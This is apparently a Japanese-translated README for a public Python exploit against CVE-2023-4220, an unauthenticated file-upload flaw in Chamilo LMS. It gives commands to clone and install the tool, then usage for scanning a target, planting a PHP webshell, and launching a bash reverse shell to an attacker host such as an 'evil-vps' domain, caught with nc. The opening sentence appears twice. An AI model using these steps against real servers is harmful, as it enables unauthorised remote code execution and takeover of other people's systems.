
これは、CVE-2023-4220で説明されているChamiloのLMSソフトウェアのセキュリティ脆弱性を悪用するためのPythonスクリプトです。
これは、CVE-2023-4220 に記載されている Chamilo's LMS ソフトウェアのセキュリティ脆弱性を悪用するためのPythonスクリプトです。このシステムは 1.11.24 より前のバージョンで脆弱です。
リポジトリをマシンにクローンし、pip を使用して依存関係をインストールします(virtualenv を使用して環境を作成し、これらのインストールをグローバルインストールから分離することを推奨します)。
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
スクリプトには、Chamilo's のルートパスを含む ターゲットURL(例:**http://example.com/chamilo**、**http://example.com**、**http://chamilo.example.com**)と、実行するアクション(3つあります:**scan**、**webshell**、**revshell**)が必要です。
このアクションは、/main/inc/lib/javascript/bigupload/files/ エンドポイントにアクセスして、ターゲットが脆弱かどうかを確認します。
python3 main.py -u http://example.com/chamilo -a scan

このアクションは、脆弱なエンドポイントに PHP webshell ファイルを作成します。
python3 main.py -u http://example.com/chamilo -a webshell

このアクションは、bash リバースシェル ファイルを作成して実行します。そのために、まず前のアクションと同じ方法を使用して webshell を作成します。その後、いくつかのコマンドを実行して bash ファイルを作成・実行します。定義したポートで nc またはその他のユーティリティを使用してリッスンしていることを確認し、実際にリバース接続を受信できるようにしてください。また、ホストは有効な 内部/公開 IPv4(例:172.17.1.4 や 186.227.4.31)または登録したドメイン(例:evil-vps.domainreg.net)を使用できます。
python3 main.py -u http://example.com/chamilo -a revshell

注記: 近日中に Windows ホスト向けの Windows ペイロードオプションを追加予定です。